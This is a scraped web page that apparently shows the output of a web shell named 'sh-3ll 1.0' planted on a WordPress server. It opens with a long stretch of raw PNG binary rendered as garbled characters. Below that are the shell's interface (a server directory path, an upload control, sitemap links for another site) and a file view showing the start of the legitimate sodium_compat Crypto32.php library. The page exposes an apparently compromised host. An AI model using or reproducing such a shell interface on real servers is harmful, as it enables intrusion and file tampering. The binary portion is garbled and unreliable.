PNG  IHDR   Q gAMA a cHRMz& u0 `: p Q<bKGD gmIDATx w U ﹻ & ^C X( J I@  "% (** B X +* i "]j(IH {~ R) [ ~ >h { }g y )I $I j          .I $I $ ʊ y@ }x . : $I $I i}  V Z  PC)I $I F  ^ 0ʐJ $I $ Q^ }{ "  r = OzI $gR Ze C. IO vH eK X $IM px sk . 쒷/ &  r [޳ < v| .I ~ )@ $ up dY R  a $I | M . e Jaֶ pS Y R 6j >h %IR ز  i f&  u J) M $I vL i = H; 7UJ , ] ,X $I 1  AҒ J  $ X Y XzI @G N ҥR T)E @ ; ]K* M w;# 5_ wO n~ \ DC& $(A 5 R R FkvIR } l ! RytRl; ~^Ƿ  Jj اy 뷦BZ Jr &ӥ 8 P j w~ vn v X ^ (I; 4 R= P[ 3]J , ]ȏ ~ : 3 ? [  a &e)` e* P[ 4] T =Cq 6 R[ ~ޤ r XR Հg( t _HZ -Hg M $ ãm L5 R u k *`%C- E6/   %[ t X.{ 8 P9Z   .vk  XŐKj gKZ Hg ( aK9ڦ mKj Ѻm _ \ # $5 ,)-  61eJ , 5m| r ' =   &ڡd %-]J on  X m| { R Ҟ  e $eڧY X Y  rԮ-a 7 RK 6h >n$5A V ڴ i * ֆ K) mѦ tm r 1p| q:흺,)O i * ֺ K) ܬ ֦ K-5 r 3 >0ԔHj Jئ EZ j ,%  r e ~ / z %j V M ڸ mr t) 3]J ,  T  K֦O vԒg  i i *   bK i NO~ % P W  0= d  i i  2 t J9 J  ݕ { 7 "I P 9 JK Tb u,%  r " 6 RKU } Ij 2  HK Z XJ ,妝 X Y  rP  ެ 2 4 c %i ^ IK|.H ,%  r b :XR l 1X 4Pe/` x &  P 8 Pj 28 M z s x  2  r \ zR P z 4J } y  P[g= L)  .Q[ 6Rj Wgp FI H *-`I  M RaK9T X c q *I y [ j E>cw% gL R ԕi F Cj - ď a` #e~ I j ,%  r ,)?[gp  FI˨ mn WX# >mʔ X A DZf9, nKҲz I Z XJ , L# k i P z 4JZF , I,` 61% 2s $  , VO Ϛ2 /U FJ fy 7 K > X + 6 S TX Ie  JI  Lz M fKm L RaK9 %| 4p9L w JI !`N sia zĔ)   %-  X  M  q > pk $-$ Q 2  x# N ؎ - QR }ᶦHZ ډ ) J , l#  i@y n3   L N` ; nڔ X  u X5 p F)  m| ^ 0( >B H F9(c զE er JI rg 7 4I@z 0\ JI  i 䵙 RR 0 s; $ s6eJ , `n 䂦 0 a )S) A  1eJ ,堌# 6 35R I gpN Hu  TH _S  ԕqV e ` &S) > p;S$魁eKI  uX `I  4 춒 o}`m $1" : PI <[ v9 ^ \p TJj r iRŭ P{# {R2,`) e-`mgj ~ 1 ϣ L Kam 7 &U\j / 3mJ , `F  ;M ' 䱀  .KR#  )y h Tq ;p cK9(  q!w ?  u RR,n.yw *UXj# \ ]ɱ  (q v2=R q f B#i Jm m L <] Y ͙ # $5 u TU 7 Ӧ X R+q ,`I} qL '  ` 6 K ͷ 6  r , ] 0S$- [RKR3 o iRE | nӦ X R. (i : L D L TJj Y %o : )  6  r x zҒ q TJj h㞦I  . $Y R.ʼ n GZ \ֿ  f:%5 5 I ˼! 6 dK x m  4E "mG _  s? .e*  ?L RfK9 %  q # uh$ ) i 3U  L RfK9yx m܌b j 8  4 $ i 1U ^@Wbm  4uJ ,  Ҫ A >  _Ij ?1 v 3 2 [ gL R D 9 6 o Ta R ׿ N7% L 2 NT ,`)7 & Ɲ L *꽙 yp _$ M 2 # A S ,`)7 $r k TA 29 _ Iy e" |/0 t) $ n X T2 `Y J  ; 6 J x" .e < ` $) P I$ 5 V4] 29   SRI> ~ =@j ] l p 2`K9Jaai ^" Ԋ 29 O RI% :X V5]J m  N9 ] H;1U C39 NI%  Xe78 t)a ; O i Ҙ >X t "~G> _mn:%  |~ޅ_ +] $ o ) @ ǀ{hgN; IK 6 G& rp ) T2 i ୦K Ju v* T = T  O SV >( ~D >d m ,I*  Ɛ : R # ۙNI% D>G .n $ o ; +# R R ! .e U  ˽ TRI 2 8 t)1L WϚ>IJ a3 oF b u& : tJ* (F7 y 0 Z R ^ p  'Ii L 24x | X RI% ۄ>S1]J y [z L $ adB7  .eh4  % % 누>W E Tf+3 IR: I 3Xה)3אO ۦSR O' ٺ )S }" q O r[B7 ϙ.edG )^E TR"R t R ݜh  0}  < S ɧx .6,) &  )SI p j 'I ? A L "  L  .\ TZV N ! 'I Y. pAS 5} TRbNL 3 ” d b e ) 4] Mg/S  Z{ni ,)=k  Д d p ǦO uLb7 ߛ2%lO }u ) K ]le T P  j eS(I Z ִ R ^eJ%%* /\ Ke ̈́ -O M $  |.5eJ  o s)^]oJ%%, 㚃R < p LS * `GӦ  tdt< 5  o' / 6 ٧ _ BIJ kH  _ 6%d rQ b gZ%%n ڍ9o1mj U g JR> L F VӦD B^k_ J Dj \ = L S(I v─a T eZ%e U A M- 0; ~˃@ i |l @S 4y  7 2 > sX-vA } ϛBI  !ݎߨ  W l *)3{' Y| iS lEڻ(  5 K t SI $ Uv0 2  ,~ ԩ~ x ; P 4 ց C r O%ty n4 25: KM l D ^ 4JR xS ه F_}شJ T S 6uj +ﷸk $e Z O% G *^ V2  u3E Mj 3 k%)ok  I]d T ) UR K DS  7 ~ m@ TJR ~ 荪 f T" ֛L \ s M  -0 T K f J z+  n إK r L  &j ( ) [ E&I ߴ>e FW _ kJR |! O :5 /2跌3 T- '| zX  r yp0 J S ~^ F >- 2 < `*% ZFP ) bS  n"  L :) +pʷf(pO 3 TMW$~  >@~ū: TA IsV 1} S2 < % ޟ M ?@ iT ,E ū oz%i ~ g |`wS( ] oȤ 8 ) $ ntu`өe `6y Pl Iz MI{ ʣ z ʨ )IZ 2 = ld:5+ 請M $-ї ; U >_ g sY $Á N 5 W   z W fIZ ) - y u XI fp ~S*IZ dt ; t >K ū KR |$ #Lc Ԁ+2 \ ;kJ `] Y  ǔ  M1B) U bG"IRߊ <x ܾ ӔJ   0 Z  = ' Y 嵤 Le v e g ) $ z n  V-º ^ 3Ւ o f #0 Tfk ^ Z s[ *I꯳3{ ) ˬ W 4Ւ4 Odp bZ R  S | *I  5 5 #  " & -IvT& / 윚Ye: i $ 9 { Lk u R e [ I~ _ \ ؠ% > GL $iY 8 9ܕ " S `kS.I l C;Ҏ4 x& > u_0J Lr < J 2 (^ $5 L s =Mg V ~ ,Ij u > 7 r2 )^=G $ 1: 3 G< `J 3 ~ &IR%  6 T x / rIj  3 O< ʔ&#f _yX J i ގN  Sz; T x ( i 8% # 4 ~ AS+Ij e  r I U rIj  3 62 v8 8 5 +Ij A h K__5 X  % n V%Iͳ-y |7 XV  2 v4 fzo  _6 8  " S/I-qbf ; Lk F )K SM $  Ms >K W N V  } ^` - 큧3 2Œ Vؙ G d u ,^ ^m % 6 ~  N n & ͓  3Œ V Z MsRpfE W %I wd ǀ Lm[ 7 W& bIR L @Q | )*  i ImsI  MmKm y V` i $ G+R 0 t V'  !  V )֏ 28 v  U 7͒ v  H ꦼt  x ꗞ T ;S }  7 M f + fIR  H N ZUk U x5 SA Jㄌ 9  Mq  μ AIRi| j 5 )o *^ '<$ T  w I 1 hE U ^c _ j ?  Е$%d`z c y f ,X O IJ nTg A U XRD   } { H } ^ S,P5 V 2 \ Xx`p Z  |Y k: $e ~ @nW L .j + ϝ Y b퇪 bZ BV u ) u  /IJ_ 1 [ p.p60 bC >|X 9 1P : N\ ! 5 qUB}5 a5ja `ub c VxYt1N 0 Z  z  l4 ]7­gKj ] ? 4ϻ * [ b g$)+À *x쳀ogO$~,5 ز U S    9  lq3 +5 mgw@ n p1 sso Ӻ=  | N6 / g( Wv7U ; zωM= wk ,0 u T g _ `_ P` uz? 2 yI !b ` k ĸSo +Q  x%!\ ο e   | އ  ԁK S-s6 pu _ (ֿ $ i+ + T8= e Y;  צ P +p h x WQ v  * |p1 .  ά. XRk IQ Y P, d r Z  |   B % w P| S5` ~́@ i ޾ E ; Չaw{o' Q ?% iL{u D ?  N1 B D ! o w PHRe FZ *    k _-~  {  E9 b- ~P `  f E{AܶB J A FO wx6  R ox 5 K5 = W we hS8 ( J C l J  ~ p+ F  i ;ŗo+ : bD #g( C " wA^  r. F 8L; dzd IH U X ݆ Ϟ X g )I F q e m %I 4 d j&pp T { '{ HO x ( Rk 6^C ٫ O. ) 3 :s( ۳(Z ?~ٻ8 9 zmT" PL tw䥈 5  &b<8GZ- Y & K ?e8,`I 6  e (֍x b8 3 ` r zX j )F =l($I j 2* (F ?h(/9ik:  I`m# p3 Mg   L aKj c /U # n5 S #  m(^)=y=đ x8Ŭ  I [U]  ~S цA 4 p $-F i(  R , 7C x ;X = c   I > { Km \ o(T v 2 v x 2q i   iDJ N , Ҏ  !1f 5quB j 1  ! 8 r  D Fd( !  W  Ql ,g S k  L 1Bx g' ' ՞ ^ ǘ; p Q  P(c _ IRu j g( W z b s # P ­rz > k  c&nB= q+  ؔX n#r5  )co *Ũ +G ?7 < | P   Q ӣ' G `uO d>%M ct z # Ԫ  ڞ & 7 CaQ ~N '  -P . W`Oedp0 3C!IZc I AMP U ۀ5 J < \u~+ { 9 (Fb b y A e B  hOS ܳ 1 b È  T #  ŠyDžs ,`5 } D  C - ` ̞%r& ڙa 8 7Q  W W p6e7 Rϫ/ o  Y ꇅ N ܶ ը tc !  L  A  T 7 V4 J sū  I- 0 P x z7 QN F _ i   Z g úW k G 83  0e Wr9 X  ]㾮݁#  Jˢ C }0 =3 ݱ tB i ] _ & { {[/ o[ ~ \q 鯜 0 0 ٩  |  cD 3 =4 B_b RY b$ó BR sf &  l L X#M* C _ L܄:gx )WΘs GSb  u L rF$9 ' ;\4 Ɍ q ' n [%p. Q`  u h N b`eCQyQ| l _  C>L b꟟3h Sb # x N xS s^ 88 | Mz ) }: ](vbۢ amŖ࿥ 0)Q 7 @ 0 =?^k(* J } 3ib kF n H jB׻ NO  z  x} 7p 0 t f   D X .lw gȔ h Ծ Ų }6 g E | Lk LZ t  eu+= q \I v0쮑 ) Q ٵpH8 /2?Σ o > J v pp h  o~ f>%bM M } \ // ": PT c(v 9v ! g ո Q ) U fV G +! 35{= x\ 2 +  k i,y$ ~A1 iC 6#)v  C 5 ^> +gǵ @1 Hy٪7 u;p ps ϰ u /S < aʸ Gu't D1 ԝI < p g|   6 j 'p: tպ h  X { o(7v], * } 6 a_ < u` Ȯ r.E ;ˑ q io p R "  26 2E 8j ]  U 鿍ǜ v D ,2 վ 8ϫ : e/^AQ T H{ WgRl ̊  2Yx  "1 Q > wX Rk,O ] Lܳ ~V< F 8 a _g~ o. XCD ?S t h 梫A o %  ~K1ݵ O1 LyZ bJ E Q xpq i Cpv a6 _ : wejT  ] " < u`"  2> o4  5rp"N5k ; m { rZ b  Φ${#)  `( Ŵ g ,;j % 6 j  . pyYT ?}-  kB  D c3q A` N WQ  ū2 0 /^A  Z W% N Q MI . X#P # ,^Eb c&  ?X R tA V |Y . 1 ! ؅ ⨉ccww >  i v l(J  T ~ u` ٵDm  q) + Ri  x/ x  8cyFO ! / * !/ & ,7 <. N , YDŽ &ܑ Q F1 Bz )F P ʛ ?5 d  6`  kQձ λc ؎ %58 2  Y &nD _$Je4 >a ? ! ͨ | Ȏ WZ S s  v 8 j   ( I & y j Jb5 m ?  H Wp =    g} G 3 # |I ,5v珿 ] H~ R3 @B   [☉9Ox~ oMy =J ; xUVoj  b U s l_  35 t- (Ճɼ RB7 U! q c + x 4 H _ Q o֮$[ GO< 4` &č \GO c[ .[* A f%m G/ ň M / r W /Nw~B1U3 J ? P& Y )` ѓ Z 1 p] ^l“ W#)lWZ i  l U Q u` -  m|xĐ,   _ ƪ|9i: _ {*(3G ѧ} Uo D+ >m_ ?V Pۅ 15 &}2 | /p IOʵ > G Z9 cmíت mnz  )yߐb   D   >e}: ) r|@ R5q V S  A 10 C% E _ '^ 8c    R 7O; 6 [ eKeP  G  ϦX7 j  b} OT GO^j n*媓 7n  GMC  t, k31 R b (v yܴ ʭ !  iTh8~ ZY Z p  (q  s  RL ? b }  c Ũ ʊGO^ ! rP JO 1 5 MJ[ c&~   Z`" ѓޔ  H1 C&  ^| Ш| rʼ, A wĴ? b 5) t  L U  )F | & g٣O] oqSU j y( x< Ϳ3 . FS k oYg 2 \_#w  j {u'r Q  > o  ; %n | F * O _ L " e 9um Dds ?. fu u Qb IW z |4\0 s b; O v xOS s ; G% T4g FR u rj  (֍ڑb u ԖK D u 1MK{ 1^ q; C= 6\8 F R 艇 !  %\Y Ô U| 88 m )֓ Nc L ve  C 6z;  o& X x5 9 :q 6 1 Z (T 7 >C? g c ļ x ѐ Z  o o- 0 8j ہ x , ` '   Ҕ Oc Rl f ~ ` jj " .N v+ sM _ ]   Z k g( UOP   y εx% pU h 2    ( @ il0 ݽ QXxp px- N S ( W O+ 轾 n Fߢ   3M  <;z ) FBZ j c i u / Q oF 7R ¥ Z F L F ~ # ȣ ߨ^<쩡 ݛк  v џ) )  M E>ώ x4 m#!- m !L;vv#~Y[ đ K  m  x 9.[, U FS C VkZ + ߟ r Y٧ IZd/ io i$ % ͝ب_ֶX 3 ܫ hNU Z Z g k = ] =  b  b JS[ w j U( )  *I =ώ:}-蹞 l Uj : 1 }  M W m =̛  _ ¾,8 {__  m{_ P V  K^n3 e sw5 ӫh # $- q= A̟> ,^I}P ^ J$ qY~Q[ Xq 9 < r d sߏǜs # %/ y kKZ  b ? S k tc 񫝶L  &I W! b >{# & T.^  G Vj _ _R K p  n,b=` ż Y@ ^՝ ;z {p aV Kk QXj / )y TI c&F ;FB G 7w g ZZD G ! x r_ t Ƣ! } i / V =M / # n B8 Xx Ы ^ @ CR <{䤭  Y CN  ) e K OSƟa $ & g[i3 .C 6x rOc  8 TI  ; o hH6 P &L{ @ q 6 [ G zp ^  71 j ( l ` J }]  e6 X  ☉ #͕  ׈$A B1 Vj h㭦IRs  qFBj w Q_7 Xk >y"   N= M B0 , C # o6MR c 0 | $ ) ف  "1  !i xY<  B 9mx `  , t A >)5ػ Q ?j  Q ? cn >Y Z e  Tis v h # GMމȇ p : ԴVuږ 8ɼH ]C. 5C!UV;F`m b Bk L TM vP ʍϤj ? ԯ/Q r1 N B`9s"  s TYs z & 9S%U԰ > { < ؿ SM xB |H \3 @!U | k']   $U +> | HHM  Lޢ ? V9i D!- @ x  TI  î % 6Z *  9X @HMW# ? n N ,o e6 ?tQw ڱ . ]-   y ' :mW 0#! J82qF jH -` ѓ & M 0 u Uγmxϵ  ^-  _ \ ] )@0R t.8 /?ٰ C Y] x }=sD3 o j ަ Ы N uS%U }Ԥw HH >ڗ jܷ_3gN q7 [q  2 l a *  A r  Ǔ Ԗ+p 8 / R GM  ]j a c d( JhWko 6 ڎb j ]i 5 Bj 3+ 3 !\j 1   U Z L s L T v8 HHmup< U  \ GMމ 3 R+  w4R 6 j  XW M T! u( *! Pz , # Sq * 8?vww )kO a $ [& ? * bB X @ % 8 ] = R r)kO w 0j i M Tq ng$ 2\ q 8f : e N1 R xr< 5 ; M p^ @;  7]R ꎾ JtER . / (5 v3 R[ @= h l ?  l @; .  [] Q* Z\ 4  "1P 'Y w x # ǀg { 5 i _IUR z RɞsyS5q E  = @ Y  っ v k   6 &  5 1E o0 | kp c  # j=` D WRU j̟ J'P w2 S v : p g 3Rv }, #  8 b Z~ & (F = i >< >gK M Jj  0 @H% , W ΃ 7 R) " >c , x ix   ј ^  aܖ > H[ i.UI Hc U 1=y W\ = S*  G R~ )AF  = ` &  2 h` D z T 󑓶 J+  ? W+} C % P:| 0H  ܆ }- <;O C[ ~o. $~ i } ~ HQ Tv X Έ r=b}$ v i z L 4 : ȰT|4 ~ * !o X QR6 L k+ #  t/g lԁߖ   [ Jڶ_N$ k *" .  x s  xX  7jRVbA  A ʯKҎ U3  ) zS NN _ ' s ?f ) 6 X  !%s s A kʱ> qƷ b h g %n ~p 1RE GM  HH = B Jiy[< 5 ǁJҖ g K R * 倳 e ~ HUy )A g,K)` V w6bRR: q L#\ r  cl K / $ s h *$   6 덤 KԖc 3 Z 9 = Ɣ =o> X Ώ "1 )a ` S JJ 6 k< U  -] b m` {r y; T u _GR5 * %6 do #XRg# -!nl $u 3 A L+Q{ 9 x~ a- | H  vbq[\ NJT% ] rO8, E -F w)+?(Y{ Lz n6  ׀ ?C  R ~ ,)m 䎧 R 7 cww qpW ڳ=i. U`Xf F b= V LJ H^LI} % } | w aG $ , ^ R^ 6 k2 ^B {7 t  V %@G q p %R zģN_ HHI[7 ֱ >( < c e {%kϊ  P +  SL' T cM J WR m ŏ " w) qc e f ꒵i? b7 b  ( ' " 2r% ~ HUS 1 \<  (` 1 W x 9 = 8HY9 m:X 1 8 b g  D1 u ~|H ;K -  U ep ,, C 1 RV. M R 5 άh  , t W O8W C $ XRV sQS]3G J| 1 2 [ v M  : k #  ~tH 3 0Rf-  HYݺ-`I 9 %l I D T m\  S {] 9 gO ڒ M NCV\ G * 2  J R Ũ; R ҏ ^  ڽ ̱ mq 1E u? To 3I  ) y^ # j J w ^ Ń j ^ v   vl B_ ⋌ P 4x>0$ c> K†A ļ9s_V jT t0l #  m  >E - , , x ,  - W )  سo& 9 6 R E XR.6b  Xw +)G A  E v L ) ͞K4 $p= Ũ i_ѱ O j b HY  / +@ θH9޼] N ԥ %n { &zjT ? Ty) s^ U L lb , P iTf ^ <À ]   62R^V 7)S!nl l  S 6~ ͝ V } -=%* ʻ>  G   D nK <  y &>L  Py7'r=Hj 9 V`[c" *  ^ 8H pc  O 8 b nU `4 J ȪA Ƌ# 1_\ XϘH  PR gi k( ~G ~ 0 D A A _2 p | J 묭a  2 \N C r ] M _0 ^T %e#  vD ^ % x y-n  } -E \ 3 aS% yN! r_ { )s A w ڼp1pEAk ~v < :`'ӭ^ 5  A r X OI驻 T  ( dk ) _ \< w  ^ W I " RFj3 V# M<,o J  .H # \ SK s]    ) 9> P u A * B Y ]  y B " l \ ey hH *t  b K)3    IK Z 򹞋X jN n *n>k ] X _ d ! ry BH  ] *R 0(#' 7 %es9?? ښFC ,ՁQP  j AR  J \Ρw K # j  ah g w ; 2$ l* )  % Xq5 !U᢯ 6Re] | 0 [ _  _64 c h & _} i L8K Eg Ҏ 7 M  / \`|.p, ~` a  = BR?x ܐrQ  8K  XR  2M 8 f ? `s gW S% " Ԉ 7R%  $ N   } ?QL1|-э ټwI Z % pv L 3Hk>,I m g W 7{  E  x PHx 7 3R A  @R S CC  !\ȟ 5I XR^Z xHл $Q[ ŝ 40 ( > + _C > BR t <,T r T {  O / H +˟ Pl6 I B)/ V  C <6 a 2    ~   ( XwV4 g n  XR ϱ5 ǀHٻ?tw 똤Eyxp { # WK  q  G%5 ] , ( 0ӈH HZ ])ג=K1j & G(FbM @   )% I` XR g ʔ  KZ G(v P, <` [ K n^ SJR sAʠ 5xՅF` 0&R b V  t x :Ea UE /{ f  i 2;.I A wW8 / t T x A GOo N ? G } l L ( n ` Zv? p B 8K _g  I +ܗ # i ? ޙ . ) p  $ u tc ~DžfՈE o3  l/)I-U ?a ԅ ^ j x A r A ΧX   } DmZ@QLےbTXGd .^|x KHR{ |Ε W_h]  I J`[ G9 { ) .y )  < D * zk (ּ Ya O 8S ?  2-   H13  #pK" I`]`O h &= S  F1Z /Ie D1R W a "t' x?!)Ou: 1  | 6 gt\s  7 = z_; ؠ > 0X Y A1]q p? p _ k+J*  Y @HI> ^ ? g t.06R n  ,  `  ?) ;p pSF9  Z X L  BJP W j gQ| &)7! Hj Q t  <| ؅ W 5 x W HIz Y oV M G P Hj n`+ \ (d  N W)F+I rS [ | /a  `K | ͻ 0Hj { R,  Q= \ (F }\ W  R)A g SG`I s n AR =| 8 $} G(v C  $)s FBJ ?] _ u XRv ύ 6z  Ũ G[ 3   6- T9 H z p  W ̞ú   X g 큽 = 7C u  fzI  $ ) k i ^q k -)  0H* N` QZ  k k]/  t   n n sI ^Gu't= 7$  Z; {  8 ^ jB % IItR QS7 [ ϭ 3 $ _ O Q J`7 ! ] W "  W,) Iy W AJA ;K  WG `IY {8 k$I $ ^ % 9 . ^(` N| LJ % @ $I }ֽp =FB* xN =gI?Q{٥ 4B)m w $I gc~d Z@G 9K X ?7)a K % ݅K $IZ -`I p C    U 6 $I \0  >! 9 k} Xa  II S 0H $I H ?1R . Ч j : 4~R w @p $I r A* u } W j WFPJ  $I ➓/  6#! L Ӿ + X36 x 8J |+L;v $I o 4 3  0  1 R2 0 M I $-E} @ ,pS ^ޟR[ / s¹' 0H $IKyf Ÿ f VO π FT* a$I > H  e ~ V Y/3 R / ) >d$I >2 8`Cj  w ,n@ FU* 9tt f$I ~<; = /4RD~ @ X - ѕ z ἱI $ : ԍ R a @ b X {  + Qx u q $I Л z o /~3\8 ڒ 4B  N7 $IҀ j V]n1 8H $I YFBj 3 ̚ ̵  ja  p p $I s/3R Ӻ - Yj+L; .0 R ́ I $ A v? #!5 " aʄ  j} U Km ɽ H $Ij C  Ys?h$I Dl8 4 3  . v } m 7 UiI= & =0L g0$I 4 :  emb e `   e Qbm 0u ? $I T!Sƍ' -  s  v )s#C 0 : XB 2 a w I $ zbww { ."p Pz O = Ɔ \  [ o($I aw] `  E ).K v i : L *#gР7[ $I   yG PI=@ R 4 y R~ ̮ ´cg I $I/< t P ͽ h Dg o 94  Z^k盇 ΄8 I 56 ^ W $I ^ 0 ̜ N ?4* H`237}g +h   x o q) SJ@p| ` $I %>   - h O 0e O > \ԣNߌZ D6 R =K ~n($I $ y 3 D>o4 b#px 2 $ yڪt z W  ~a $I ~? x< e{W  g ô { x$/ = {t G 0 7 e a  B $IҀ yG ^S 卆 "p uS 3 * E=洣 ,`9 > ' Bww pH $IZ ݑ nC 㧄 Pc _9 sO gw J=l1 :mKB > Ab<4L p $I b o1Z   Q @8 5 b ̍ S' F  , F e ,^I $Ij E dù{ l4 8 Ys_ s Z8. x m"+{~ ?q, Z D !I $ ϻ '|X h B )= …' ] M > 5 r g otԎ 獽 PH $Ij IP  hh)n# cÔq A' ug5qw  U &r F|1 E%I $% ] !' 3 AFD/;C k_` 9  v !ٴt PV ; x` '  *b Qa w I $I x 5 FC 3D _ ~ A _ #O݆ Dv V?< q w +I $I {  = Z 8" .#RI Y yj Ǫ =f D l 9 % M ,  a8$I $ Yw i[ 7 ݍFe $ s 1 ՋBV A? ` ]#!  oz  4zjLJ o8$I $% @3j A  a4 ( o ; p,,dya =  F9ً[ LS PH $IJ Y Љ+3 > 5"  3 9 aZ <ñh! {T pB G k j}  S p $I lvF .  F$I z< '\ K*qq .f <   2 Y ! S"-\I $I Yw č jF$ w9 \ߪB . 1 v!Ʊ ?+  r : ^ !I $ BϹ B  H  " B ;L 'G[ 4 U #5> ੐ )|# o0 aڱ $I > } k& 1`U# V ? Ys V x > {t 1 [ I~D &(I $I/{ H 0fw " q"  y % 4 I X y E~ M 3 8Xψ L}q   E $I [ >  nD ? ~ s   f  ]o ΁ cT 6"?' _ Ἣ $I > ~ .f |'!   N ? ⟩ 0 G KkX Z E ] ޡ;  /   & ?k O ۘH $IR  ۀw XӨ < 7@ P nS 04 a  Ӷ p . : @ \IWQ J6 s S%I $ e 5 ڑ v` 3:  x' ; w q_ vp gHyX Z 3 gЂ7{{   E  uԹ n ± } $I $ 8t;b| 5 91n ء   Q" P   6 O 5 i } i R ̈́ % Q ̄p! I䮢 ] O{ H $IR ϻ 9 s֧ a=`- aB\X 0"+5"C 1 H b?߮ 3x 3 & g ş g g  l _ h Z^,`5 ? ߎ vĸ% ̀M! OZC2#0x  LJ 0 G w $I $I } < {Eb + y  ; iI,`  ܚ  F   : 5  ܛ A 8 -O -| 8 K 7 s |# Z8 a& > < a&  /V tb t L ʌI $I $I $I $I $I $IRj  D D %tEXtdate:create2022-05-31T04:40:26+00:00 !Î%tEXtdate:modify2022-05-31T04:40:26+00:00 |{2IEND B` sh-3ll

HOME


sh-3ll 1.0
https://www.pemco.vn/wp-sitemap-posts-post-1.xmlhttps://www.pemco.vn/wp-sitemap-posts-page-1.xmlhttps://www.pemco.vn/wp-sitemap-posts-blocks-1.xmlhttps://www.pemco.vn/wp-sitemap-posts-product-1.xmlhttps://www.pemco.vn/wp-sitemap-posts-featured_item-1.xmlhttps://www.pemco.vn/wp-sitemap-taxonomies-category-1.xmlhttps://www.pemco.vn/wp-sitemap-taxonomies-product_cat-1.xmlhttps://www.pemco.vn/wp-sitemap-taxonomies-product_tag-1.xmlhttps://www.pemco.vn/wp-sitemap-taxonomies-featured_item_category-1.xmlhttps://www.pemco.vn/wp-sitemap-users-1.xml
DIR:/var/www/vhosts/dienmaychuyennghiep.com/httpdocs/wp-includes/sodium_compat/src/
Upload File :
Current File : /var/www/vhosts/dienmaychuyennghiep.com/httpdocs/wp-includes/sodium_compat/src/Crypto32.php
<?php

if (class_exists('ParagonIE_Sodium_Crypto32', false)) {
    return;
}

/**
 * Class ParagonIE_Sodium_Crypto
 *
 * ATTENTION!
 *
 * If you are using this library, you should be using
 * ParagonIE_Sodium_Compat in your code, not this class.
 */
abstract class ParagonIE_Sodium_Crypto32
{
    const aead_chacha20poly1305_KEYBYTES = 32;
    const aead_chacha20poly1305_NSECBYTES = 0;
    const aead_chacha20poly1305_NPUBBYTES = 8;
    const aead_chacha20poly1305_ABYTES = 16;

    const aead_chacha20poly1305_IETF_KEYBYTES = 32;
    const aead_chacha20poly1305_IETF_NSECBYTES = 0;
    const aead_chacha20poly1305_IETF_NPUBBYTES = 12;
    const aead_chacha20poly1305_IETF_ABYTES = 16;

    const aead_xchacha20poly1305_IETF_KEYBYTES = 32;
    const aead_xchacha20poly1305_IETF_NSECBYTES = 0;
    const aead_xchacha20poly1305_IETF_NPUBBYTES = 24;
    const aead_xchacha20poly1305_IETF_ABYTES = 16;

    const box_curve25519xsalsa20poly1305_SEEDBYTES = 32;
    const box_curve25519xsalsa20poly1305_PUBLICKEYBYTES = 32;
    const box_curve25519xsalsa20poly1305_SECRETKEYBYTES = 32;
    const box_curve25519xsalsa20poly1305_BEFORENMBYTES = 32;
    const box_curve25519xsalsa20poly1305_NONCEBYTES = 24;
    const box_curve25519xsalsa20poly1305_MACBYTES = 16;
    const box_curve25519xsalsa20poly1305_BOXZEROBYTES = 16;
    const box_curve25519xsalsa20poly1305_ZEROBYTES = 32;

    const onetimeauth_poly1305_BYTES = 16;
    const onetimeauth_poly1305_KEYBYTES = 32;

    const secretbox_xsalsa20poly1305_KEYBYTES = 32;
    const secretbox_xsalsa20poly1305_NONCEBYTES = 24;
    const secretbox_xsalsa20poly1305_MACBYTES = 16;
    const secretbox_xsalsa20poly1305_BOXZEROBYTES = 16;
    const secretbox_xsalsa20poly1305_ZEROBYTES = 32;

    const secretbox_xchacha20poly1305_KEYBYTES = 32;
    const secretbox_xchacha20poly1305_NONCEBYTES = 24;
    const secretbox_xchacha20poly1305_MACBYTES = 16;
    const secretbox_xchacha20poly1305_BOXZEROBYTES = 16;
    const secretbox_xchacha20poly1305_ZEROBYTES = 32;

    const stream_salsa20_KEYBYTES = 32;

    /**
     * AEAD Decryption with ChaCha20-Poly1305
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $ad
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function aead_chacha20poly1305_decrypt(
        $message = '',
        $ad = '',
        $nonce = '',
        $key = ''
    ) {
        /** @var int $len - Length of message (ciphertext + MAC) */
        $len = ParagonIE_Sodium_Core32_Util::strlen($message);

        /** @var int  $clen - Length of ciphertext */
        $clen = $len - self::aead_chacha20poly1305_ABYTES;

        /** @var int $adlen - Length of associated data */
        $adlen = ParagonIE_Sodium_Core32_Util::strlen($ad);

        /** @var string $mac - Message authentication code */
        $mac = ParagonIE_Sodium_Core32_Util::substr(
            $message,
            $clen,
            self::aead_chacha20poly1305_ABYTES
        );

        /** @var string $ciphertext - The encrypted message (sans MAC) */
        $ciphertext = ParagonIE_Sodium_Core32_Util::substr($message, 0, $clen);

        /** @var string The first block of the chacha20 keystream, used as a poly1305 key */
        $block0 = ParagonIE_Sodium_Core32_ChaCha20::stream(
            32,
            $nonce,
            $key
        );

        /* Recalculate the Poly1305 authentication tag (MAC): */
        $state = new ParagonIE_Sodium_Core32_Poly1305_State($block0);
        try {
            ParagonIE_Sodium_Compat::memzero($block0);
        } catch (SodiumException $ex) {
            $block0 = null;
        }
        $state->update($ad);
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($adlen));
        $state->update($ciphertext);
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($clen));
        $computed_mac = $state->finish();

        /* Compare the given MAC with the recalculated MAC: */
        if (!ParagonIE_Sodium_Core32_Util::verify_16($computed_mac, $mac)) {
            throw new SodiumException('Invalid MAC');
        }

        // Here, we know that the MAC is valid, so we decrypt and return the plaintext
        return ParagonIE_Sodium_Core32_ChaCha20::streamXorIc(
            $ciphertext,
            $nonce,
            $key,
            ParagonIE_Sodium_Core32_Util::store64_le(1)
        );
    }

    /**
     * AEAD Encryption with ChaCha20-Poly1305
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $ad
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function aead_chacha20poly1305_encrypt(
        $message = '',
        $ad = '',
        $nonce = '',
        $key = ''
    ) {
        /** @var int $len - Length of the plaintext message */
        $len = ParagonIE_Sodium_Core32_Util::strlen($message);

        /** @var int $adlen - Length of the associated data */
        $adlen = ParagonIE_Sodium_Core32_Util::strlen($ad);

        /** @var string The first block of the chacha20 keystream, used as a poly1305 key */
        $block0 = ParagonIE_Sodium_Core32_ChaCha20::stream(
            32,
            $nonce,
            $key
        );
